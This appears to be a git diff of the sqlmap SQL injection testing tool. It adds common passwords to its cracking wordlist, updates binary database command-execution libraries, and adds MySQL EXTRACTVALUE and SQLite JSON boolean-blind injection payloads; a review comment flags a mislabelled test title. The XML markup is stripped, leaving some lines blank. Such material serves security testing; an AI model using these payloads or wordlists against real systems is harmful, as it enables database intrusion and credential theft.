+6530,8 @@ orioles orion orion1 orlando +oroasina +oroigbaniwole orville orwell oscar @@ -6362,6 +6547,7 @@ ottawa otter otto ou812 +OU812 ou8122 ou8123 outback @@ -6383,6 +6569,7 @@ ozf ozp ozs ozzy +p pa pa55w0rd pa55word @@ -6401,6 +6588,7 @@ paco pad paddle padres +paeseuwodeu page pain painless @@ -6413,6 +6601,8 @@ pajero pakistan palace paladin +Paladin +palavra-passe palermo pallmall palmer @@ -6420,6 +6610,7 @@ palmtree paloma pam pamela +Pamela pana panama panasoni @@ -6458,12 +6649,22 @@ park parker parol parola +parolachiave +paroladordine +parole +paroli +parolja +parool parrot partner party +parulle pasadena +pasahitza pascal +pasfhocal pasion +pasowardo pass pass1 pass12 @@ -6472,19 +6673,26 @@ pass1234 passat passion passme +passord passpass passport passw0rd +Passw0rd passwd passwo1 passwo2 passwo3 passwo4 passwor + password password! password. +Password +PASSWORD password1 +Password1 +password11 password12 password123 password2 
@@ -6493,6 +6701,8 @@ password9 passwords passwort pastor +pasuwado +pasvorto pasword pat patch @@ -6527,11 +6737,14 @@ peace peace1 peach peaches +Peaches peaches1 peachy peacock peanut +peanut1 peanuts +Peanuts pearl pearljam pearls @@ -6564,11 +6777,13 @@ penny1 pentagon penthous pentium +Pentium people peoria pepe pepito pepper +Pepper pepper1 peppers pepsi @@ -6594,6 +6809,7 @@ pervert petalo pete peter +Peter peter1 peterbil peterk @@ -6622,6 +6838,7 @@ phish phishy phoebe phoenix +Phoenix phoenix1 phone photo @@ -6653,6 +6870,7 @@ piff pigeon piggy piglet +Piglet pigpen pikachu pillow @@ -6660,6 +6878,7 @@ pilot pimp pimpdadd pimpin +pimpin1 pimping pinball pineappl @@ -6699,6 +6918,7 @@ pizza1 pizzaman pizzas pjm +pk3x7w9W placebo plane planes @@ -6716,6 +6936,7 @@ playball playboy playboy1 player +player1 players playing playmate @@ -6741,6 +6962,7 @@ poa pocket poetic poetry +pogiako point pointer poipoi @@ -6748,6 +6970,8 @@ poison poiuy poiuyt pokemon +pokemon1 +pokemon123 poker poker1 poland @@ -6778,6 +7002,7 @@ poohbear poohbear1 pookey pookie +Pookie pookie1 pool pool6123 @@ -6791,6 +7016,7 @@ pooppoop poopy pooter popcorn +popcorn1 pope popeye popo @@ -6811,16 +7037,6 @@ porsche porsche1 porsche9 porsche911 -portal30 -portal30_admin -portal30_demo -portal30_ps -portal30_public -portal30_sso -portal30_sso_admin -portal30_sso_ps -portal30_sso_public -portal31 portal_demo portal_sso_ps porter @@ -6844,6 +7060,7 @@ power1 powercartuser powers ppp +PPP pppp ppppp pppppp @@ -6865,6 +7082,7 @@ pressure presto preston pretty +pretty1 priest primary primus @@ -6872,6 +7090,7 @@ prince prince1 princesa princess +Princess princess1 princeton pringles @@ -6910,6 +7129,7 @@ psa psalms psb psp +p@ssw0rd psycho pub public @@ -6940,6 +7160,7 @@ puppy puppydog purdue purple +Purple purple1 puss pussey 
@@ -6959,14 +7180,19 @@ pw123 pyramid pyro python +q12345 +q123456 q1w2e3 q1w2e3r4 q1w2e3r4t5 +q1w2e3r4t5y6 qa qawsed qaz123 qazqaz qazwsx +qazwsx1 +qazwsx123 qazwsxed qazwsxedc qazxsw @@ -6977,12 +7203,14 @@ qing qiong qosqomanta qp +qq123456 qqq111 qqqq qqqqq qqqqqq qqqqqqq qqqqqqqq +qqww1122 qs qs_adm qs_cb @@ -7007,8 +7235,10 @@ quest question quincy qwaszx +qwe qwe123 qweasd +qweasd123 qweasdzxc qweewq qweqwe @@ -7017,13 +7247,20 @@ qwer1234 qwerasdf qwerqwer qwert +Qwert qwert1 qwert123 +qwert12345 qwert40 qwerty +Qwerty qwerty1 qwerty12 qwerty123 +qwerty1234 +qwerty12345 +qwerty123456 +qwerty321 qwerty7 qwerty80 qwertyu @@ -7035,6 +7272,7 @@ qwqwqw r0ger r2d2c3po rabbit +Rabbit rabbit1 rabbits race @@ -7057,8 +7295,10 @@ rafaeltqm rafiki rage ragnarok +rahatphan raider raiders +Raiders raiders1 railroad rain @@ -7070,6 +7310,7 @@ raindrop rainman rainyday raistlin +Raistlin raleigh rallitas ralph @@ -7084,10 +7325,12 @@ rampage ramrod ramses ramsey +ramzobur ranch rancid randall random +Random randy randy1 rang @@ -7129,6 +7372,7 @@ realmadrid reaper reason rebecca +Rebecca rebecca1 rebel rebel1 @@ -7192,12 +7436,13 @@ rene renee renegade reng -rep_owner +rental repadmin repair replicate report reports +rep_owner reptile republic republica @@ -7269,6 +7514,7 @@ rob robbie robby robert +Robert robert1 roberta roberto @@ -7301,6 +7547,7 @@ rocknroll rockon rocks rockstar +rockstar1 rockwell rocky rocky1 @@ -7365,6 +7612,7 @@ roy royal royals royalty +rr123456rr rrrr rrrrr rrrrrr @@ -7385,6 +7633,7 @@ rugger rules rumble runaway +runescape runner running rupert @@ -7393,6 +7642,7 @@ rush2112 ruslan russel russell +Russell russia russian rusty @@ -7402,6 +7652,7 @@ ruth ruthie ruthless ryan +s123456 sabbath sabina sabine @@ -7426,6 +7677,7 @@ sakura sal salami salasana +salasona saleen salem sales @@ -7440,13 +7692,15 @@ salvador salvation sam sam123 -samIam samantha +samantha1 sambo samiam +samIam samm sammie sammy +Sammy sammy1 samoht sample 
@@ -7459,6 +7713,7 @@ samsung1 samuel samuel22 samurai +sanane sanchez sancho sand @@ -7484,6 +7739,7 @@ santafe santana santiago santos +santoysena sap saphire sapper @@ -7501,11 +7757,13 @@ sasha1 saskia sassy sassy1 +sasuke satan satan666 satori saturday saturn +Saturn saturn5 sauron sausage @@ -7532,6 +7790,7 @@ scheme schmidt schnapps school +school1 science scissors scooby @@ -7626,6 +7885,7 @@ serpent servando server service +Service serviceconsumer1 services sesame @@ -7650,6 +7910,8 @@ sexxxy sexxy sexy sexy1 +sexy12 +sexy123 sexy69 sexybabe sexyboy @@ -7661,6 +7923,7 @@ seymour sf49ers sh shadow +Shadow shadow1 shadow12 shadows @@ -7768,16 +8031,20 @@ shuo shuttle shutup shyshy -si_informtn_schema sick sidekick +Sidekick sidney siemens sierra +Sierra +sifra +sifre sigma sigmachi signal signature +si_informtn_schema silence silent silly @@ -7809,6 +8076,7 @@ sinned sinner siobhan sirius +sisma sissy sister sister12 @@ -7824,7 +8092,9 @@ sixty sixty9 skate skater +skater1 skeeter +Skeeter skibum skidoo skiing @@ -7853,6 +8123,7 @@ slammer slapper slappy slapshot +slaptazodis slater slave slave1 @@ -7870,6 +8141,7 @@ slimshad slinky slip slipknot +slipknot1 slipknot666 slippery sloppy @@ -7900,6 +8172,7 @@ smoke1 smoker smokes smokey +Smokey smokey1 smokie smokin @@ -7929,6 +8202,7 @@ snooker snoop snoopdog snoopy +Snoopy snoopy1 snow snowball @@ -7997,6 +8271,7 @@ southern southpar southpark southpaw +southside1 sowhat soyhermosa space @@ -8014,6 +8289,7 @@ sparkle sparkles sparks sparky +Sparky sparky1 sparrow sparrows @@ -8034,6 +8310,7 @@ speed speedo speedway speedy +Speedy spence spencer spencer1 @@ -8045,6 +8322,7 @@ spider spider1 spiderma spiderman +spiderman1 spidey spierson spike @@ -8064,6 +8342,8 @@ spock spoiled sponge spongebo +spongebob +spongebob1 spooge spooky spoon 
@@ -8140,18 +8420,22 @@ starstar start start1 starter +startfinding startrek starwars +starwars1 state static station status +Status stayout stealth steel steele steeler steelers +steelers1 stefan stefanie stefano @@ -8165,14 +8449,17 @@ stephan stephane stephani stephanie +stephanie1 stephen stephen1 stephi stereo sterling +Sterling steve steve1 steven +Steven steven1 stevens stevie @@ -8216,9 +8503,9 @@ stranger strangle strap strat -strat_passwd stratford strato +strat_passwd stratus strawber strawberry @@ -8282,6 +8569,7 @@ suicide sullivan sultan summer +Summer summer1 summer69 summer99 @@ -8303,12 +8591,16 @@ sunnyday sunrise sunset sunshine +Sunshine +sunshine1 super super1 +super123 superb superfly superior superman +Superman superman1 supernov supersecret @@ -8337,6 +8629,7 @@ suzanne suzie suzuki suzy +Sverige svetlana swallow swanson @@ -8361,6 +8654,7 @@ swinging switch switzer swoosh +Swoosh sword swordfis swordfish @@ -8377,19 +8671,19 @@ symbol symmetry sympa synergy +synthimatiko syracuse sys -sys_stnt sysadm sysadmin sysman syspass +sys_stnt system system5 systempass systems syzygy -t-bone tab tabasco tabatha @@ -8424,6 +8718,7 @@ tara tardis targas target +target123 tarheel tarheels tarpon @@ -8436,13 +8731,16 @@ tata tatiana tattoo taurus +Taurus taxman taylor +Taylor taylor1 tazdevil tazman tazmania tbird +t-bone tbone tdos_icsap teacher @@ -8461,6 +8759,7 @@ teens teflon tekila tekken +Telechargement telecom telefon telefono @@ -8483,6 +8782,7 @@ tenerife teng tennesse tennis +Tennis tequiero tequila terefon @@ -8504,7 +8804,6 @@ test123 test1234 test2 test3 -test_user tester testi testing @@ -8512,6 +8811,7 @@ testing1 testpass testpilot testtest +test_user tetsuo texas texas1 @@ -8547,6 +8847,7 @@ theodore theone there theresa +Theresa therock therock1 these @@ -8560,6 +8861,7 @@ thirteen this thisisit thomas +Thomas thomas1 thompson thong @@ -8575,6 +8877,7 @@ thumb thumbs thumper thunder +Thunder thunder1 thunderb thunderbird 
@@ -8598,6 +8901,7 @@ tigercat tigers tigers1 tigger +Tigger tigger1 tigger2 tight @@ -8619,6 +8923,7 @@ ting tinker tinkerbe tinkerbell +tinkle tinman tintin tiny @@ -8798,12 +9103,15 @@ tuan tubas tucker tucson +tudelft tuesday +Tuesday tula tulips tuna tunafish tundra +tunnussana tupac turbine turbo @@ -8839,8 +9147,8 @@ ultima ultimate ultra um_admin -um_client umbrella +um_client umesh umpire undead @@ -8885,6 +9193,7 @@ username usmarine usmc usnavy +Usuckballz1 util utility utlestat @@ -8940,6 +9249,7 @@ veritas verizon vermont vernon +Vernon verona veronica veronika @@ -8957,6 +9267,8 @@ vicky victor victor1 victoria +Victoria +victoria1 victory video videouser @@ -8971,6 +9283,7 @@ vikram villa village vincent +Vincent vincent1 vinnie vintage @@ -9013,13 +9326,17 @@ vsegda vulcan vvvv vvvvvv +wachtwoord +wachtwurd waffle wagner +wagwoord waiting walden waldo walker wallace +wall.e wallet walleye wally @@ -9060,6 +9377,7 @@ water water1 waterboy waterloo +Waterloo waters watford watson @@ -9078,6 +9396,7 @@ webmaste webmaster webread webster +Webster wedding wedge weed @@ -9115,6 +9434,7 @@ wh whale1 what whatever +whatever1 whatnot whatsup whatthe @@ -9164,6 +9484,7 @@ williamsburg willie willis willow +Willow willy wilma wilson @@ -9172,6 +9493,7 @@ wind windmill window windows +Windows windsor windsurf winger @@ -9182,6 +9504,7 @@ winner winner1 winners winnie +Winnie winniethepooh winona winston @@ -9198,13 +9521,14 @@ wives wizard wizard1 wizards -wk_test wkadmin wkproxy wksys +wk_test wkuser wms wmsys +woaini wob wolf wolf1 @@ -9217,6 +9541,7 @@ wolfpac wolfpack wolverin wolverine +Wolverine wolves woman wombat @@ -9227,6 +9552,7 @@ wonderboy wood woodie woodland +Woodrow woodstoc woodwind woody @@ -9244,9 +9570,11 @@ work123 working workout world +World wormwood worship worthy +wow12345 wowwow wps wraith 
@@ -9271,17 +9599,17 @@ wwwwwww wwwwwwww wxcvbn wyoming -x-files -x-men xademo xanadu xander xanth xavier +xbox360 xcountry xdp xerxes xfer +x-files xfiles xian xiang @@ -9291,6 +9619,7 @@ ximenita xing xiong xla +x-men xmodem xnc xni @@ -9326,6 +9655,7 @@ yaya yeah yeahbaby yellow +yellow1 yellowstone yes yeshua @@ -9340,10 +9670,12 @@ yomama yong yosemite yoteamo +youbye123 young young1 -your_pass yourmom +yourmom1 +your_pass yousuck yoyo yoyoma @@ -9360,9 +9692,11 @@ yyyy yyyyyy yyyyyyyy yzerman +z123456 zachary zachary1 zack +zag12wsx zander zang zanzibar @@ -9409,12 +9743,14 @@ zipper zippo zippy zirtaeb +zk.: zmodem zodiac zoltan zombie zong zoomer +zoosk zorro zouzou zuan @@ -9424,9 +9760,12 @@ zxc123 zxccxz zxcv zxcvb +Zxcvb zxcvbn zxcvbnm +Zxcvbnm zxcvbnm1 +zxcvbnm123 zxcxz zxczxc zxzxzx diff --git a/data/txt/user-agents.txt b/data/txt/user-agents.txt index c90cd0b0e2b..c65829aa646 100644 --- a/data/txt/user-agents.txt +++ b/data/txt/user-agents.txt @@ -1,4 +1,4 @@ -# Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +# Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) # See the file 'LICENSE' for copying permission # Opera diff --git a/data/txt/wordlist.tx_ b/data/txt/wordlist.tx_ index 239b2a9abe2..f2b52c90658 100644 Binary files a/data/txt/wordlist.tx_ and b/data/txt/wordlist.tx_ differ diff --git a/data/udf/mysql/linux/32/lib_mysqludf_sys.so_ b/data/udf/mysql/linux/32/lib_mysqludf_sys.so_ index f401c800406..bfd4440ba5f 100644 Binary files a/data/udf/mysql/linux/32/lib_mysqludf_sys.so_ and b/data/udf/mysql/linux/32/lib_mysqludf_sys.so_ differ diff --git a/data/udf/mysql/linux/64/lib_mysqludf_sys.so_ b/data/udf/mysql/linux/64/lib_mysqludf_sys.so_ index f442d1f14de..1992ed0347e 100644 Binary files a/data/udf/mysql/linux/64/lib_mysqludf_sys.so_ and b/data/udf/mysql/linux/64/lib_mysqludf_sys.so_ differ 
diff --git a/data/udf/mysql/windows/32/lib_mysqludf_sys.dll_ b/data/udf/mysql/windows/32/lib_mysqludf_sys.dll_
index 17814b6ba53..bb8ec366d4c 100644
Binary files a/data/udf/mysql/windows/32/lib_mysqludf_sys.dll_ and b/data/udf/mysql/windows/32/lib_mysqludf_sys.dll_ differ
diff --git a/data/udf/mysql/windows/64/lib_mysqludf_sys.dll_ b/data/udf/mysql/windows/64/lib_mysqludf_sys.dll_
index 33a7adbe0c5..97799b69d4d 100644
Binary files a/data/udf/mysql/windows/64/lib_mysqludf_sys.dll_ and b/data/udf/mysql/windows/64/lib_mysqludf_sys.dll_ differ
diff --git a/data/udf/postgresql/linux/32/10/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/10/lib_postgresqludf_sys.so_
index f7e6da36499..33dbdeeb35b 100644
Binary files a/data/udf/postgresql/linux/32/10/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/32/10/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/32/11/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/11/lib_postgresqludf_sys.so_
index 3b030e70b1f..c56d766209a 100644
Binary files a/data/udf/postgresql/linux/32/11/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/32/11/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so_
index 7c72515a892..3fb236e2644 100644
Binary files a/data/udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so_
index 43f7cdc55d9..d734fff00ae 100644
Binary files a/data/udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so_
index 2c49149d0d5..da50fa8eafc 100644
Binary files a/data/udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so_
index f463ee7543d..83732d33298 100644
Binary files a/data/udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/32/9.1/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/9.1/lib_postgresqludf_sys.so_
index 147039a2542..ee1ca8ccef1 100644
Binary files a/data/udf/postgresql/linux/32/9.1/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/32/9.1/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/32/9.2/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/9.2/lib_postgresqludf_sys.so_
index cf56372ea9a..ab7e7456223 100644
Binary files a/data/udf/postgresql/linux/32/9.2/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/32/9.2/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/32/9.3/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/9.3/lib_postgresqludf_sys.so_
index 8ec4566eb7b..5314a0a3886 100644
Binary files a/data/udf/postgresql/linux/32/9.3/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/32/9.3/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/32/9.4/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/9.4/lib_postgresqludf_sys.so_
index 310f838de53..da9d0a7f6f7 100644
Binary files a/data/udf/postgresql/linux/32/9.4/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/32/9.4/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/32/9.5/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/9.5/lib_postgresqludf_sys.so_
index 504be8277e3..1100ab820fd 100644
Binary files a/data/udf/postgresql/linux/32/9.5/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/32/9.5/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/32/9.6/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/9.6/lib_postgresqludf_sys.so_
index 2e19b356e14..f9396a86aa5 100644
Binary files a/data/udf/postgresql/linux/32/9.6/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/32/9.6/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/64/10/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/10/lib_postgresqludf_sys.so_
index ee94408ecd4..21bbddcf59e 100644
Binary files a/data/udf/postgresql/linux/64/10/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/64/10/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/64/11/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/11/lib_postgresqludf_sys.so_
index 8a61270ca7a..9327b1cdba3 100644
Binary files a/data/udf/postgresql/linux/64/11/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/64/11/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/64/12/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/12/lib_postgresqludf_sys.so_
index b1258cbe9a4..a9874449464 100644
Binary files a/data/udf/postgresql/linux/64/12/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/64/12/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so_
index 2c2e96ca70a..e4b124fc8b3 100644
Binary files a/data/udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so_
index 2db355e267e..2c22afae9a2 100644
Binary files a/data/udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so_
index 1335862f761..ab23ee6a749 100644
Binary files a/data/udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so_
index bb2b6f195b5..8dae29c8336 100644
Binary files a/data/udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/64/9.1/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/9.1/lib_postgresqludf_sys.so_
index c730910de82..e5d05fc6f16 100644
Binary files a/data/udf/postgresql/linux/64/9.1/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/64/9.1/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/64/9.2/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/9.2/lib_postgresqludf_sys.so_
index 6ddad36fa41..ff31df61499 100644
Binary files a/data/udf/postgresql/linux/64/9.2/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/64/9.2/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/64/9.3/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/9.3/lib_postgresqludf_sys.so_
index 0f9bdf36280..d5576fdd8cf 100644
Binary files a/data/udf/postgresql/linux/64/9.3/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/64/9.3/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/64/9.4/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/9.4/lib_postgresqludf_sys.so_
index 0f54d5136c7..2350427f4ac 100644
Binary files a/data/udf/postgresql/linux/64/9.4/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/64/9.4/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/64/9.5/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/9.5/lib_postgresqludf_sys.so_
index a5bdf892ddc..eae84bdadd0 100644
Binary files a/data/udf/postgresql/linux/64/9.5/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/64/9.5/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/64/9.6/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/9.6/lib_postgresqludf_sys.so_
index bbe6aabf672..4a408a1ae0c 100644
Binary files a/data/udf/postgresql/linux/64/9.6/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/64/9.6/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll_ b/data/udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll_
index a05e36e8c95..40f838b30f5 100644
Binary files a/data/udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll_ and b/data/udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll_ differ
diff --git a/data/udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll_ b/data/udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll_
index 7a03c0d0def..a9b4b48c7b7 100644
Binary files a/data/udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll_ and b/data/udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll_ differ
diff --git a/data/udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll_ b/data/udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll_
index eac654286bc..06aee54d778 100644
Binary files a/data/udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll_ and b/data/udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll_ differ
diff --git a/data/udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll_ b/data/udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll_ index 6bfd62c07d4..67b5d34976f 100644 Binary files a/data/udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll_ and b/data/udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll_ differ diff --git a/data/xml/banner/generic.xml b/data/xml/banner/generic.xml index 555981e86d4..fc2fb97f59a 100644 --- a/data/xml/banner/generic.xml +++ b/data/xml/banner/generic.xml @@ -34,7 +34,7 @@ - + diff --git a/data/xml/banner/server.xml b/data/xml/banner/server.xml index a499bcd204d..4d99cade0bd 100644 --- a/data/xml/banner/server.xml +++ b/data/xml/banner/server.xml @@ -3,14 +3,14 @@ - + @@ -97,6 +97,10 @@ + + + + @@ -163,6 +167,10 @@ + + + + @@ -315,7 +323,11 @@ - + + + + + @@ -436,8 +448,12 @@ + + + + - + @@ -756,7 +772,7 @@ - + @@ -858,7 +874,15 @@ - + + + + + + + + + diff --git a/data/xml/banner/set-cookie.xml b/data/xml/banner/set-cookie.xml index a9d8143d8b2..419a436445a 100644 --- a/data/xml/banner/set-cookie.xml +++ b/data/xml/banner/set-cookie.xml @@ -62,4 +62,32 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + diff --git a/data/xml/boundaries.xml b/data/xml/boundaries.xml index fb41a83c093..20bf0d10315 100644 --- a/data/xml/boundaries.xml +++ b/data/xml/boundaries.xml @@ -554,6 +554,15 @@ Formats: + + 5 + 7 + 1 + 3 + [RANDSTR1], + [RANDSTR2] + + 4 diff --git a/data/xml/errors.xml b/data/xml/errors.xml index de6786dc99f..dda262765b9 100644 --- a/data/xml/errors.xml +++ b/data/xml/errors.xml @@ -15,7 +15,6 @@ - @@ -199,6 +198,7 @@ + @@ -210,6 +210,11 @@ + + + + + diff --git a/data/xml/payloads/boolean_blind.xml b/data/xml/payloads/boolean_blind.xml index 67cf9940d10..ae8b6de95f2 100644 --- a/data/xml/payloads/boolean_blind.xml +++ b/data/xml/payloads/boolean_blind.xml 
@@ -484,18 +484,18 @@ Tag: - MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int) + MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE) 1 5 1 1,2,3,8 1 - AND ([INFERENCE])*[RANDNUM] + AND EXTRACTVALUE([RANDNUM],CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 0x3A END) - AND ([RANDNUM]=[RANDNUM])*[RANDNUM1] + AND EXTRACTVALUE([RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 0x3A END) - AND ([RANDNUM]=[RANDNUM1])*[RANDNUM1] + AND EXTRACTVALUE([RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 0x3A END)
MySQL @@ -503,18 +503,18 @@ Tag: - MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int) + MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE) 1 5 3 - 1,2,3 + 1,2,3,8 2 - OR ([INFERENCE])*[RANDNUM] + OR EXTRACTVALUE([RANDNUM],CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 0x3A END) - OR ([RANDNUM]=[RANDNUM])*[RANDNUM1] + OR EXTRACTVALUE([RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 0x3A END) - OR ([RANDNUM]=[RANDNUM1])*[RANDNUM1] + OR EXTRACTVALUE([RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 0x3A END)
MySQL @@ -596,6 +596,45 @@ Tag: Oracle
+ + + SQLite AND boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (JSON) + 1 + 2 + 1 + 1 + 1 + AND CASE WHEN [INFERENCE] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END + + AND CASE WHEN [RANDNUM]=[RANDNUM] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END + + + AND CASE WHEN [RANDNUM]=[RANDNUM1] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END + +
+ SQLite +
+
+ + + SQLite OR boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (JSON) + 1 + 3 + 3 + 1 + 2 + OR CASE WHEN [INFERENCE] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END + + OR CASE WHEN [RANDNUM]=[RANDNUM] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END + + + OR CASE WHEN [RANDNUM]=[RANDNUM1] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END + +
+ SQLite +
+
+ diff --git a/data/xml/payloads/error_based.xml b/data/xml/payloads/error_based.xml index f9505522f38..0d717f96170 100644 --- a/data/xml/payloads/error_based.xml +++ b/data/xml/payloads/error_based.xml @@ -221,6 +221,26 @@
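Review bot: The titles of both added SQLite tests read `WHERE, HAVING, GROUP BY or HAVING clause (JSON)`, which names HAVING twice and does not match the wording the other tests in this file use. The element names are stripped on this page, so which value is the clause list is inferred from position, but both entries appear to carry a single clause value of 1; if that is right, `SQLite AND boolean-based blind - WHERE or HAVING clause (JSON)` and the matching OR title would describe what the tests actually cover. The title is what ends up in scan output, so a wrong clause list there misleads whoever later reads the report or tunes a detection against it.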
